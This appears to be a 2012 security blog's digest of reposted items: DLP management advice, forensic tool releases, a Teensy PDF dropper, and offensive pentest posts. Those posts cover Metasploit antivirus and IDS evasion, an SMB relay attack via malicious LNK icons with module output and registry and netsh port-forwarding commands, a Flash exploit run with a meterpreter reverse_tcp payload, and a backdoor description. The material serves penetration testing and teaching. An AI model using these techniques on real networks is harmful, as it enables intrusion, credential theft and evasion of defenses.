Monday, February 27, 2012

Teensy PDF Dropper Part 2

Last year Stevens showed how to use a Teensy micro-controller to drop a PDF file with embedded executable. But hewas limited to a file of a few kilobytes, because of the Arduino programming language he used for the Teensy.

In this post, he is using WinAVR and now its only limited by the amount of flash memory on Teensy++.

First we use a new version of my PDF tools to create a PDF file with embedded file:

Filter i is exactly like filter h (ASCIIHexDecode), except that the lines of hex code are wrapped at 512 hex digits, making them digestible to our C compiler.

Another new feature of my make PDF tools is Python 3 support.

Here is a sample of our C code showing how to embed each line of the pure-ASCII PDF document as strings:

Macro PSTR makes that the string is stored in flash memory. The embedded executable is 57KB large, but still only takes half of the flash memory of my Teensy++.

After programming my Teensy++, I can fire up Notepad and let my Teensy++ type out the PDF document:

You can download my example for the WinAVR compiler here: (https)

MD5: EA14100A1BEDA4614D1AE9DE0F71B747

SHA256: 2C9A5DF1831B564D82548C72F1050737BCF17E5A25DCDC41D7FA4EA446A8FDED

Thursday, February 23, 2012

Implementing DLP- Ongoing Management

Managing DLP tends to not be overly time consuming unless you are running off badly defined policies. Most of your time in the system is spent on incident handling, followed by policy management.

To give you some numbers, the average organization can expect to need about the equivalent of one full time person for every 10,000 monitored employees. This is really just a rough starting point- we’ve seen ratios as low as 1/25,000 and as high as 1/1000 depending on the nature and number of policies.

Managing Incidents

After deployment of the product and your initial policy set you will likely need fewer people to manage incidents. Even as you add policies you might not need additional people since just having a DLP tool and managing incidents improves user education and reduces the number of incidents.

Here is a typical process:

Manage incident handling queue

The incident handling queue is the user interface for managing incidents. This is where the incident handlers start their day, and it should have some key features:

  • Ability to customize the incident for the individual handler. Some are more technical and want to see detailed IP addresses or machine names, while others focus on users and policies.

  • Incidents should be pre-filtered based on the handler. In a larger organization this allows you to automatically assign incidents based on the type of policy, business unit involved, and so on.

  • The handler should be able to sort and filter at will; especially to sort based on the type of policy or the severity of the incident (usually the number of violations- e.g. a million account numbers in a file versus 5 numbers).

  • Support for one-click dispositions to close, assign, or escalate incidents right from the queue as opposed to having to open them individually.

Most organizations tend to distribute incident handling among a group of people as only part of their job. Incidents will be either automatically or manually routed around depending on the policy and the severity. Practically speaking, unless you are a large enterprise this cloud be a part-time responsibility for a single person, with some additional people in other departments like legal and human resources able to access the system or reports as needed for bigger incidents.

Initial investigation

Some incidents might be handled right from the initial incident queue; especially ones where a blocking action was triggered. But due to the nature of dealing with sensitive information there are plenty of alerts that will require at least a little initial investigation.

Most DLP tools provide all the initial information you need when you drill down on a single incident. This may even include the email or file involved with the policy violations highlighted in the text. The job of the handler is to determine if this is a real incident, the severity, and how to handle.

Useful information at this point is a history of other violations by that user and other violations of that policy. This helps you determine if there is a bigger issue/trend. Technical details will help you reconstruct more of what actually happened, and all of this should be available on a single screen to reduce the amount of effort needed to find the information you need.

If the handler works for the security team, he or she can also dig into other data sources if needed, such as a SIEM or firewall logs. This isn’t something you should have to do often.

Initial disposition

Based on the initial investigation the handler closes the incident, assigns it to someone else, escalates to a higher authority, or marks it for a deeper investigation.

Escalation and Case Management

Anyone who deploys DLP will eventually find incidents that require a deeper investigation and escalation. And by “eventually” we mean “within hours” for some of you.

DLP, by it’s nature, will find problems that require investigating your own employees. That’s why we emphasize having a good incident handling process from the start since these cases might lead to someone being fired. When you escalate, consider involving legal and human resources. Many DLP tools include case management features so you can upload supporting documentation and produce needed reports, plus track your investigative activities.


The last (incredibly obvious) step is to close the incident. You’ll need to determine a retention policy and if your DLP tool doesn’t support retention needs you can always output a report with all the salient incident details.

As with a lot of what we’ve discusses you’ll probably handle most incidents within minutes (or less) in the DLP tool, but we’ve detailed a common process for those times you need to dig in deeper.


Most DLP systems keep old incidents in the database, which will obviously fill it up over time. Periodically archiving old incidents (such as anything 1 year or older) is a good practice, especially since you might need to restore the records as part of a future investigation.

Managing Policies

Anytime you look at adding a significant new policy you should follow the Full Deployment process we described above, but there are still a lot of day to day policy maintenance activities. These tend not to take up a lot of time, but if you skip them for too long you might find your policy set getting stale and either not offering enough security, or causing other issues due to being out of date.

Policy distribution

If you manage multiple DLP components or regions you will need to ensure policies are properly distributed and tuned for the destination environment. If you distribute policies across national boundaries this is especially important since there might be legal considerations that mandate adjusting the policy.

This includes any changes to policies. For example, if you adjust a US-centric policy that’s been adapted to other regions, you’ll then need to update those regional policies to maintain consistency. If you manage remote offices with their own network connections you want to make sure policy updates pushed out properly and are consistent.

Adding policies

Brand new policies will take the same effort as the initial polices, other than you’ll be more familiar with the system. Thus we suggest you follow the Full Deployment process again.

Policy reviews

As with anything, today’s policy might not apply the same in a year, or two, or five. The last thing you want to end up with is a disastrous mess of stale, yet highly customized and poorly understood polices as you often see on firewalls.

Reviews should consist of:

  • Periodic reviews of the entire policy set to see if it still accurately reflects your needs and if new policies are required, or older ones should be retired.

  • Scheduled reviews and testing of individual policies to confirm that they still work as expected. Put it on the calendar when you create a new policy to check it at least annually. Run a few basic tests, and look at all the violations of the policy over a given time period to get a sense of how it works. Review the users and groups assigned to the policy to see if they still reflect the real users and business units in your organization.

  • Ad-hoc reviews when a policy seems to be providing unexpected results. A good tool to help figure this out is your trending reports- any big changes or deviations from a trend are worth investigating at the policy level.

  • Policy reviews during product updates, since these may change how a policy works or give you new analysis or enforcement options.

Updates and tuning

Even effective policies will need periodic updating and additional tuning. While you don’t necessarily need to follow the entire Full Deployment process for minor updates, they should still be tested in a monitoring mode before you move into any kind of automated enforcement.

Also make sure you communicate and noticeable changes to affected business units so you don’t catch them by surprise. We’ve heard plenty examples of someone in security flipping a new enforcement switch or changing a policy in a way that really impacted business operations. Maybe that’s the goal, but it’s always best to communicate and hash things out ahead of time.

If you find a policy really seems ineffective then it’s time for a full review. For example, we know of one very large DLP user who had unacceptable levels of false positives on their account number protection due to the numbers being too similar to other numbers commonly in use in regular communications. They solved the problem (after a year or more) by switching from pattern matching to a database fingerprinting policy that checked against the actual account numbers in a customer database.

Retiring policies

There are a lot of DLP policies you might use for a limited time, such as a partial document matching policy to protect corporate financials before they are released. After the release date, there’s no reason to keep the policy.

We suggest you archive these policies instead of deleting them. And if your tool supports it, set expiration dates on policies… with notification so it doesn’t shut down and leave a security hole without you knowing about it.

Backup and archiving

Even if you are doing full system backups it’s a good idea to perform periodic policy set backups. Many DLP tools offer this as part of the feature set. This allows you to migrate policies to new servers/appliances or recover policies when other parts of the system fail and a full restore is problematic.

We aren’t saying these sorts of disasters are common; in fact we’ve never heard of one, but we’re paranoid security folks.

Archiving old policies also helps if you need to review them while reviewing an old incident as part of a new investigation or a legal discovery situation.


Analysis, as opposed to incident handling, focuses on big picture trends . We suggest three kinds of analysis:

Trend analysis

Often built into the DLP server’s dashboard, this analysis looks across incidents to evaluate overall trends such as:

  • Are overall incidents increasing or decreasing?

  • Which policies are having more or less incidents over time?

  • Which business units experience more incidents?

  • Are there any sudden increases in violations by a business unit, or of a policy, that might not be seen if overall trends aren’t changing?

  • Are a certain type of incidents tied to a business process that should be changed?

The idea is to mine your data to evaluate how your risk is increasing or decreasing over time. When you’re in the muck of day to day incident handling it’s often hard to notice these trends.

Risk analysis

A risk analysis is designed to show what you are missing. DLP tools only look for what you tell them to look for, and thus won’t catch unprotected data you haven’t built a policy for.

A risk analysis is essentially the Quick Wins process. You turn on a series of policies with no intention of enforcing them, but merely to gather information and see if there are any hot spots you should look at more in depth or create dedicated policies for.

Effectiveness analysis

This helps assess the effectiveness of your DLP tool usage. Instead of looking at general reports think of it like testing to tool again. Try some common scenarios to circumvent your DLP to figure out where you need to make changes.

Content discovery/classification

Content discovery is the process of scanning storage for the initial identification of sensitive content and tends to be a bit different than network or endpoint deployments. While you can treat it the same, identifying policy violations and responding to them, many organizations view content discovery as a different process, often part of a larger data security or compliance project.

Content discovery projects will off turn up huge amounts of policy violations due to files being stored all over the place. Compounding the problem is the difficulty in identifying the file owner or business unit that’s using the data, and why they have it. Thus you tend to need more analysis, at least with your first run through a server or other storage repository, to find the data, identify who uses and owns it, the business need (if any), and alternative options to keep the data more secure.


We’ve covered most non-product-specific troubleshooting throughout this series. Problems people encounter tend to fall into the following categories:

  • Too many false positives or negatives, which you can manage using our policy tuning and analysis recommendations.

  • System components not talking to each other. For example, some DLP tools separate out endpoint and network management (often due to acquiring different products) and then integrate them at the user interface level. Unless there is a simple network routing issue, fixing these may require the help of your vendor.

  • Component integrations to external tools like web and email gateways may fail. Assuming you were able to get them to talk to each other previously, the culprit is usually a software update introducing an incompatibility. Unfortunately, you’ll need to run it down in the log files if you can’t pick out the exact cause.

  • New or replacement tools may not work with your existing DLP tool. For example, swapping out a web gateway or using a new edge switch with different SPAN/Mirror port capabilities.

We really don’t hear about too many problems with DLP tools outside of getting the initial installation properly hooked into infrastructures and tuning policies.

Maintenance for DLP tools is relatively low, consisting mostly of five activities (two of which we already discussed):

  • Full system backups, which you will definitely do for the central management server, and possibly any remote collectors/servers depending on your tool. Some tools don’t require this since you can swap in a new default server or appliance and then push down the configuration.

  • Archiving old incidents to free up space and resources. But don’t be too aggressive since you generally want a nice library of incidents to support future investigations.

  • Archiving and backing up policies. Archiving policies means removing them from the system, while backups include all the active policies. Keeping these separate from full system backups provides more flexibility for restoring to new systems or migrating to additional servers.

  • Health checks to ensure all system components are still talking to each other.

  • Updating endpoint and server agents to the latest versions (after testing, of course).


Ongoing reporting is an extremely important aspect of running a Data Loss Prevention tool. It helps you show management and other stakeholders that you, and your tool, are providing value and managing risk.

At a minimum you should produce quarterly, if not monthly, rollup reports on trends and summarizing overall activity. Ideally you’ll show decreasing policy violations, but if there is an increase of some sort you can use that to get the resources to investigate the root cause.

You will also produce a separate set of reports for compliance. These may be on a project basis, tied to any audit cycles, or scheduled like any other reports. For example, running quarterly content discovery reports showing you don’t have any unencrypted credit card data in a storage repository and providing these to your PCI assessor to reduce potential audit scope. Or running monthly HIPAA reports for the HIPAA compliance officer (if you work in healthcare).

Although you can have the DLP tool automatically generate and email reports, depending on your internal political environment you might want to review these before passing them to outsiders in case there are any problems with the data. Also, it’s never a good idea to name employees in general reports- keep identifications to incident investigations and case management summaries that have a limited audience.

Saturday, February 18, 2012

How to Fly Under the Radar of AV and IPS with Metasploit's Stealth Features

When conducting a penetration testing assignment, one objective may be to get into the network without tripping any of the alarms, such as IDS/IPS or anti-virus. Enterprises typically add this to the requirements to test if their defenses are good enough to detect an advanced attacker. Here's how you can make sure you can sneak in and out without "getting caught".

Scan speed

First of all, bear in mind that you'll want to slow down your initial network scan so you don't raise suspicion by creating heavy network traffic. In the Advanced Settings of hte Discovery Scan, set your network scanning speed to Sneaky or Paranoid. This feature is included in Metasploit Community Edition, Metasploit Express, and Metasploit Pro.


Evading IDS/IPS

Metasploit has many different settings to evade an IDS/IPS (intrusion detection system/intrusion prevention system).

Metasploit Framework enables you to set many of these manually, for example changing the transport type, encoding, fragmenting traffic. Finding the right setting to evade the IPS system can be a little tricky.

If you want to make your life easier, you can use Metasploit Pro's pre-defined levels of evasion: You can choose Transport Evasions, and Application Evasions, all of which have the options of None, Low, Medium, and High. In the back-end, the tuning is different for each type of exploit. For example, if you’re choosing low transport evasion, it will run the exploit a little slower and chunk it up into more segments. With higher options, we change exploit-specific settings, like the compression type, the name of the webserver, or use different Unicode encodings.

You can set these IDS/IPS evasion settings in the Advanced Options of the Exploitation screen:

  • Concurrent exploits: Reduces the number of exploits that are launched at your targets at the same time. Reduce this to ensure the attack doesn't raise any red flags.
  • Transport evasion: Sends smaller TCP packets and increases time delay between packets to avoid detection.
  • Application Evasion: Adjusts application-specific evasion options for exploits involving DCERPC, SMB and HTTP. The higher the setting, the more evasion techniques are applied.

IDS evasion.png

Social engineering

When choosing the payload for social engineering campaigns, you should choose Encrypted HTTPS to ensure that your payload phones back using an encrypted session. These are harder to detect by your IDS/IPS. Social engineering campaigns are only available in Metasploit Pro.


Avoiding anti-virus

Even if you get past the IDS/IPS systems on the network, the anti-virus engine on the machine you're trying to exploit may stop your attack if you're not careful. A lot of AV vendors are flagging Metasploit exploits and payloads as malware because they can be used in an attack. That is also a reason why you shouldn't have a malware scanner installed on the machine you run Metasploit on - otherwise it may block your installation or exploits. If you must install an AV solution installed, ensure that you have excluded the Metasploit directory from the scans.

Metasploit includes various ways to avoid anti-virus detection, which again differ between editions. Metasploit Framework and Metasploit Community share the same basic AV evasion. Metasploit Express adds a self-signed binary and templates to evade detection by anti-virus solutions. Metasploit Pro includes a Rapid7-signed binary to inject code that bypasses a white list and a persistent agent that is compiled differently every time, making it very hard to detect. To get an impression how successful Metasploit is in evading anti-virus, check out the results from our test lab in the blog post "Become invisible to anti-virus protection".

How are your defenses holding up to advanced evasion techniques?

Adventures in the Windows NT Registry: A step into the world of Forensics and Information Gathering

Adventures in the Windows NT Registry: A step into the world of Forensics and Information Gathering:

As of a few days ago, the Metasploit Framework has full read-only access to offline registry hives. Within Rex you will now find a Rex::Registry namespace that will allow you to load and parse offline NT registry hives (includes Windows 2000 and up), implemented in pure Ruby. This is a great addition to the framework because it allows you to be sneakier and more stealthy while gathering information on a remote computer. You no longer need to rely on arcane Windows APIs with silly data structures and you can interact with the registry hives in an object-oriented manner. Combined with the recent ShadowCopy additions from TheLightCosine, you have a very powerful forensics suite at your fingertips.

Before I get ahead of myself, I should explain exactly what the registry is and why it matters.

When you open up regedit on a Windows computer, regedit is actually opening many different registry hives. A registry hive is a binary file that is stored either in C:\Windows\System32\config (SYSTEM, SOFTWARE, SAM, SECURITY) or in a user's profile (NTUSER.dat). These hives store system information and configurations, user information, and all sorts of just interesting information (group policy settings for instance). These files are locked while Windows is running. In the past, we have used methods like exporting specific hives in order to get around this lock, and this still works well enough. We now have the option of using the Volume Snapshot Service, or VSS, to create a copy of a hive while locked. However, there has been no good way to analyse and parse these hives on a system that wasn't running Windows after copying them.

The easiest way is to create copies of the hives, and pull them down to your local machine in a centralised place. I used 'reg SAVE HKLM\$HIVE $HIVE.hive', substituting $HIVE for the actual hive name, then download'ed the copied hive in meterpreter.

root@w00den-pickle:/home/bperry/Projects/new_hives# file ./* 
./sam.hive: MS Windows registry file, NT/2000 or above
./security.hive: MS Windows registry file, NT/2000 or above
./software.hive: MS Windows registry file, NT/2000 or above
./system.hive: MS Windows registry file, NT/2000 or above

You will find a new tool within the source tree called reg.rb (tools/reg.rb). This script consumes the Rex::Registry library and has many predefined methods to help speed up IG. Work is still being done on reg.rb, it has a lot of potential. Ideas or functionality requests are appreciated. Patches too.

A small primer on how the registry stores data is in order. WIthin a registry hive, you have 5 value types:

0x01 -- "Unicode character string"

0x02 -- "Unicode string with %VAR% expanding"

0x03 -- "Raw binary value"

0x04 -- "Dword"

0x07 -- "Multiple unicode strings separated with '\\x00'"

Types 1, 2, and 7 can be printed to a screen in a readable form without much issue. Types 3 and 4, however, are binary types and will be printed out in their base16 representations (\xde\xad\xbe\xef). Keep this in mind when querying values from a registry hive.

For instance, let's say we need to find out the Default Control Set in order to query correct values pertaining to drivers or the boot key. Your query would look similar to this:

root@w00den-pickle:~/tools/metasploit-framework/tools# ./reg.rb query_value '\Select\Default' /home/bperry/Projects/new_hives/system.hive
Hive name: SYSTEM
Value Name: Default
Value Data: "\x01\x00\x00\x00"

This tells us that the Default Control Set is ControlSet001. When we query the root key ('', "", '\', or "\\") of the SYSTEM hive, we will see the available ControlSets:

root@w00den-pickle:~/tools/metasploit-framework/tools# ./reg.rb query_key '' /home/bperry/Projects/new_hives/system

Hive name: SYSTEM

Child Keys for


Name Last Edited Subkey Count Value Count

---- ----------- ------------ -----------

ControlSet001 2010-08-21 08:56:36 -0500 4 0

ControlSet002 2010-08-21 16:05:32 -0500 4 0

LastKnownGoodRecovery 2011-12-13 21:22:55 -0600 1 0

MountedDevices 2010-08-21 08:56:18 -0500 0 4

Select 2010-08-21 16:05:32 -0500 0 4

Setup 2010-08-21 16:05:33 -0500 4 6

WPA 2010-08-21 16:08:33 -0500 4 0

Values in key


Name Value Type Value

---- ---------- -----


When querying the hives, the library queries relatively from the root key. On XP machines, the root key is always named $$PROTO.HIV. On Vista+, the root key is always named along the lines of CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}. The guid will be variable. This is important to note because many times a key will be given to you in this form:


In the above example, there are actually three parts. HKLM stands for HKEY_LOCAL_MACHINE. This tells regedit to load the local registry hives. The second part, Software, tells regedit the key is in the SOFTWARE hive. The third part, Microsoft\Windows\CurrentVersion\Uninstall, is the actual key path relative to the root key in the hive. Since reg.rb only looks at arbitrary hives, the first two parts aren't needed.

If you were to query the above key with reg.rb, the command would look like this:

reg.rb query_key '\Microsoft\Windows\CurrentVersion\Uninstall' /path/to/hive/SOFTWARE

This would enumerate the installed programs on the computer along with the date and time the key was created. Generally, the keys in the above key are created when the program is installed, so you can see how long a program has been installed on a computer as well.

The library also allows you to query for data that would otherwise be hidden. Each nodekey has the ability to have a classname. This classname isn't shown in regedit, and some very important information can be held in this container. For instance, the boot key is stored in 4 separate key classnames that would otherwise not be accessible. reg.rb allows you to query for the boot key easily:

root@w00den-pickle:~/tools/metasploit-framework/tools# ./reg.rb get_boot_key /home/bperry/tmo/hives/SYSTEM
Getting boot key
Root key: CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
Default ControlSet: ControlSet001

Accessing the hives programmatically

You may find yourself wanting to work with the hives programmatically, via a resource script with ERB, or straight from irb. The main class you will be working with is Rex::Registry::Hive. You perform queries directly off of the hive object.

msf > irb
[*] Starting IRB shell...

>> require 'rex/registry'
=> true
>> hive ='/home/bperry/tmo/hives/SYSTEM'); nil
=> nil
>> hive.hive_regf.hive_name
=> "CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}"

In the above example, we create a new hive object. Every hive has a root key, and begins with a regf block(which tells you what the name of the hive is, among other things). A root key is simply a nodekey with a special flag.

>> hive.root_key.lf_record.children.each { |k| p }; nil








=> nil

Every nodekey will have either an lf_record or a valuelist (or both!). The lf_record contains the child nodekeys. The valuelist contains the child values.

>> valuekey = hive.value_query('\Select\Default'); nil

=> nil

>> nodekey = hive.relative_query('\ControlSet001\Control\Lsa'); nil

The value_query method of the hive returns a ValueKey. The relative_query method returns a NodeKey. Performing a relative_query on a value's path rather than a node's path will return the value's parent node.

As you can see, the library is quite powerful. It gives you a lot of control over your offline hives when performing forensics or IG. There is a lot of work to be done, with write support in the future very possible. I look forward to seeing what cool modules the community can cook up that utilizes the library. Be sure to update the framework to its latest version to ensure you have the most up to date library to play with.

Wednesday, February 15, 2012

Blade™ v1.9 Released - AFF® Support, Hiberfile.sys Conversion and New
Evaluation Version

Blade v1.9. Released

This is the first release of Blade to have evaluation capabilities which allow the user to test and evaluate our software for 30 days. When Blade is installed on a workstation for the first time (and a valid USB dongle licence is not inserted) the software will function in evaluation mode.

The following list contains a summary of the new features:

  • Support for Advanced Forensic Format (AFF®)
  • Hiberfil.sys converter - supports XP, Vista, Windows 7 32 and 64bit
  • Accurate hiberfil.sys memory mapping, not just Xpress block decompression
  • Hiberfil.sys slack recovery
  • Codepage setting for enhanced multi-language support
  • SQLite database recovery
  • 30 Day evaluation version of Blade Professional
  • New recovery profile parameters for more advanced and accurate data recovery
  • Support for Logicube Forensic Dossier®
  • Support for OMA DRM Content Format for Discrete Media Profile (DCF)

We have also been working on the data recovery engines to make them more efficient and much faster than before. The searching speed has been significantly increased.

Downloads and Full Release Information

HconSTF: Security Testing Framework

HCON is a security framework. This latest release is the portable penetration testing environment, capable of assisting in all tasks of any penetration testing or vulnerability assessments and more. It has two versions based on the Firefox and Chromium source code, called Fire and Aqua respectively.

Most of the part of HconSTF is semi-automated but you still need your brain to work it out. It can be use in all kind of security testing stages, it has tools for conducting tasks like,

  1. Information gathering
  2. Enumeration & Reconnaissance
  3. Vulnerability assessment
  4. Exploitation
  5. Privilege escalation
  6. Reporting
  7. Web debugging

Key Features of HconSTF

  • Categorized and comprehensive toolset
  • Contains hundreds of tools and features and script for different tasks like SQLi,XSS,Dorks,OSINT to name a few
  • HconSTF webUI with online tools (same as the Aqua base version of HconSTF)
  • Each and every option is configured for penetration testing and Vulnerability assessments
  • Specially configured and enhanced for gaining easy & solid anonymity
  • Works for web app testing assessments specially for owasp top 10
  • Easy to use & collaborative Operating System like interface
  • Light on Hardware Resources
  • Portable – no need to install, can work from any USB storage device
  • Multi-Language support (feature in heavy development translators needed)
  • Works side-by-side with your normal web browser without any conflict issues
  • Works on both architectures x86 & x64 on windows XP, Vista, 7 (works with ubuntu linux using wine)
  • Netbook compatible – User interface is designed for using framework on small screen sizes
  • Free & Open source and always will be

As a tribute to all of the freedom fighters of all the countries, HconSTF version 0.4 codenamed ‘Freedom’, was made available on the Indian Republic day. This release has integrated many functions for anonymity and OSINT.

Download HconSTF:

HconSTF - –

Tuesday, February 14, 2012

BFT: Browser forensic tool

Browser forensic tool is a software that will search in all kind of browser history even that are archived in a few seconds.It will retrieve URLS and Title with the chosen keywords of all matching search.We can use default example profiles or create yours, with thematic search on a single click. This tool come from the Developer of Famous DarkComet RAT Tool. Browsers supported by BFT inlcude IE, Firefox, Chrome and Opera.

Monday, February 13, 2012

MS08_068 + MS10_046 = FUN UNTIL 2018

MS08_068 + MS10_046 = FUN UNTIL 2018:

TL;DR: SMB Relay + LNK UNC icons = internal pentest pwnage

I need to touch on the highlights of two vulnerabilities before we talk about the fun stuff, but I highly encourage you to read the references at the bottom of this post and understand the vulnerabilities after you are done with my little trick, as you might find one of your own.


In 2008, Microsoft released MS08_068 which patched the "SMB Relay" attack. To boil this down, an attacker gets a victim to attempt to authenticate to an attacker controlled box. The attack delays its responses to the victim and replays the important parts of the authentication that the victim sent back at the victim. You can find out a lot more about this vulnerability here:

One thing to take away from that post is that the patch stops Attacker <=> Victim, but does not / cannot fix Victim <=> Attacker <=> Victim2 (use authentication from Victim to replay to Victim2)


In 2010, Microsoft released MS10_046 which patched the Stuxnet LNK vulnerability where a malicious DLL could be loaded (locally or remotely over WebDAV) using the path of the shortcut's icon reference. LNK files are Windows shortcut files that allow the icons of the files to be changed much more dynamically than any other file type (Right click a shortcut, go to Properties, and just simply click the 'Change Icon' button). I could certainly be wrong here, but I believe all Microsoft patched was the ability to use this feature to load the DLLs via a certain Control Panel object. Which leaves the ability to load shortcut (LNK) icons from wherever we wish. ;-)

The Setup:

If you are on an internal penetration test and either exploit a machine or find an open share, you can create an LNK file with an icon that points at a nonexistent share on your attacking machine's IP and use SMB_Relay to replay those credentials to a system in which we've identified by one means or another as an 'important' host to get on.

Attacker uploads malicious LNK file to network share on FILE SHARE

Victim views it on WORKSTATION that initiates an connection to ATTACKER

Attacker relays those authentication attempts to FILE SHARE, gaining code execution if 'Victim' is an admin on FILE SHARE

If not, then NetNTLM are still visible in the logs and can be attempted to crack, or just wait for more people to view the LNK file on the public share, and hope that an admin comes by at some point.

Your mileage will vary based on where you put the LNK file.

The Video:

I have created a post module to automate the process of creating and uploading the LNK file (so you don't have to have a Windows box lying around). Here it is in action:

Module options (post/windows/escalate/droplnk):

Name Current Setting Required Description
---- --------------- -------- -----------
ICONFILENAME icon.png yes File name on LHOST's share
LHOST yes Host listening for incoming SMB/WebDAV traffic
LNKFILENAME Words.lnk yes Shortcut's filename
SESSION 1 yes The session to run this module on.
SHARENAME share1 yes Share name on LHOST

2012-02-11 07:17:19 +0000 2 1 post(droplnk) > run

[*] Creating evil LNK
[*] Done. Writing to disk - C:\DocuMe~1\Administrator\\Words.lnk
[*] Done. Wait for evil to happen..
[*] Post module execution completed

You can find the code here:

Going forward:

Obviously this isn't so effective remotely out of the box and there currently isn't a SMB_Relay for WebDAV (although I'm guessing that would work). However I was able to construct a crude way getting smb_relaying working using some pretty loud system changes to an exploited host:

  • Step 1: Disable SMB on Port 445 (it will still operate on 139 as it is a failover), this setting requires a reboot to take effect and can be done using the following command:

    • reg add HKLM\System\CurrentControlSet\Services\NetBT\Parameters /v SMBDeviceEnabled /t REG_DWORD /d 0

  • Step 2: Port forward the traffic out to your remote attacker host over a port that is allowed out, used 80:

    • netsh int portproxy v4tov4 listenport=445 connectport=80

  • Step 3: Set up SMB_Relay listening on that port on your attacker with a route in meterpreter to send all relayed authentication through your meterpreter session into and at the targeted host.

These steps can get you noticed in almost every way, so it's not recommended, I just did it as a PoC. I mean how cool is it to remotely exploit SMB vulns ;-)

The other thing is, administrators are becoming much more rare as years move along and people use lower priv users for their daily tasks, so there are currently feature requests in to the Metasploit project to make it so when you get SMB_Relay correctly forwarding good credentials, even if they aren't admin and you cannot get code execution it would be nice to be able to go through the files that person has access to on the targeted system / file share. A final pipe dream of this post is to have a multi-threaded smb_relay that 2, 3 or even 10 servers can be targeted with the relayed authentication.

just saying'…. /me nudges the Metasploit devs…


SMB_Relay References:

LNK DLL Loader References:

Trixd00r Backdoor Linux : How to Setup Trixd00r to hack remote computer

trixd00r is an advanced and invisible userland backdoor based on TCP/IP for UNIX systems. It consists of a server and a client. The server sits and waits for magic packets using a sniffer. If a magic packet arrives, it will bind a shell over TCP or UDP on the given port or connecting back to the client again over TCP or UDP. The client is used to send magic packets to trigger the server and get a shell.

CVE-2011-2140 Adobe Flash Player MP4 Metasploit Demo

Eric posted the PoC video for Adobe exploit on his blog.

Timeline :

Vulnerability reported to ZDI by Anonymous

Vulnerability reported to the vendor by ZDI the 2011-02-10

Coordinated public release of the vulnerability the 2011-08-23

Vulnerability reported exploited in the wild in November 2011

First PoC provided by Abysssec the 2012-01-31

Metasploit PoC provided the 2012-02-10

PoC provided by :

Alexander Gavrun



Reference(s) :





Affected version(s) :

Adobe Flash Player and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.

Tested on Windows XP Pro SP3 with :

Adobe Flash Player

Longtail SWF Player

Internet Explorer 7

Description :

This module exploits a vulnerability found in Adobe Flash Player’s Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn’t included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.

Commands :

use exploit/windows/browser/adobe_flash_sps
SET PAYLOAD windows/meterpreter/reverse_tcp


Free Visio 2010 Video Tutorials from Microsoft

Free Visio 2010 Video Tutorials from Microsoft:

Microsoft recently began releasing a series of free video tutorials for Microsoft Visio 2010. The videos are hosted by three notable Visio experts (or "MVPs" as Microsoft calls them): Scott Helmers, David Parker, and Chris Roth. Chris is also the author of Using Microsoft Visio 2010, an excellent introduction to the new features of Visio 2010 (and Visio in general).

Currently, only the first five of the 24 tutorials have been released. Unfortunately, Microsoft has stuck to a glacial release schedule of one tutorial per week; the last of the series is set to be published in mid-June. The videos average around six or seven minutes apiece and are available for direct download. Given their length one would think embedded Flash video would be a preferable medium, but at least this way they can easily be archived for later reference.


Friday, February 10, 2012

Quickpost: Disassociating the Key From a TrueCrypt System Disk

Didier stevens on his blog has a nice post on Disassociating the key from a TrueCrypt system.

TrueCrypt allows for full disk encryption of a system disk. I use it on my Windows machines. You probably know that the TrueCrypt password you type is not the key. But it is, simply put, used to decrypt the master key that is in the volume header. On a system drive, the volume header is stored in the last sector of the first track of the encrypted system drive (TrueCrypt 7.0 or later). Usually, a track is 63 sectors long and a sector is 512 bytes long. So the volume header is in sector 62. When this header is corrupted or modified, you can no longer decrypt the disk, even with the correct password. You need to use the TrueCrypt Rescue Disk to restore the volume header. This rescue disk was created when you encrypted the disk. I’m using Tiny Hexer on the Universal Boot CD For Windows to erase the volume header (you can’t modify the volume header easily when you booted from the TrueCrypt system disk; using a live CD like UBCD4WIN is one possible workaround).

First I’m checking the geometry of the system drive with MBRWizard:

Take a look at the CHS (Cylinders Heads Sectors) value: S = 63 confirms that a track is 63 sectors long.

Then I open the system drive with Tiny Hexer (notice that the sector size is 512 bytes or 0×200 bytes):

I go to sector 62, the last sector of the first track:

It contains the volume header (an encrypted volume header has no recognizable patterns, it looks like random bytes):

Then I erase the volume header by filling the sector with zeroes and writing it back to disk:

And if you absolutely want to prevent recovery of this erased sector, write several times to it with random data.

Booting is no longer possible, even with the correct password. The TrueCrypt bootloader will tell you the password is incorrect:

One can say that I’ve created a TrueCrypt disk that requires 2-factor authentication. To decrypt this disk, you need 2 factors: the password and the corresponding TrueCrypt Rescue Disk.

First you need to boot from the TrueCrypt Rescue Disk, and select Repair Options (F8):

And then you write the volume header back to the system disk. Remark that the TrueCrypt Rescue Disk requires you to enter the password before it writes the volume header to the disk:

And now you can boot from the system disk with your password.

Use this method if you need to travel with or mail an encrypted system disk and want to be 100% sure there is no way to decrypt the drive while in transit. But don’t travel with the 2 factors on you, send the TrueCrypt Rescue Disk via another channel.

Remark: MBRWizard allows you to wipe sectors, but for whatever reason, it couldn’t successfully wipe sector 62 on my test machine.

Oh yeah, don’t forget to make a full backup before you attempt this technique ;-)

Video: DarkMarket

Video: DarkMarket: Author Misha Glenny was interviewed by broadcast journalist Charlie Rose recently. The majority of discussion was based on Misha's current book, DarkMarket: Cyberthieves, Cybercops and You.

The interview is 20 minutes long, a provides an excellent summary of the threats currently facing the Internet.

Misha Glenny, DarkMarket
Click to watch

On 08/02/12 At 01:50 PM

FatCat Auto SQLl Injector

This is an automatic SQL Injection tool called as FatCat , Use of FatCat for testing your web application and exploit your application more deeper. FatCat Features that help you to extract the Database information, Table information, and Column information from web application. Only If it is vulnerable to SQL Injection Vulnerability.

The user friendly GUI of FatCat and automatically detect the sql vulnerability and start exploiting vulnerability.


1) Normal SQL Injection

2) Double Query SQL Injection

Look forward to the below features in the next version:

1) WAF bypass

2) Cookie Header passing

3) Load File

4) Generating XSS from SQL


1) PHP Verison 5.3.0

2) Enable file_get_function


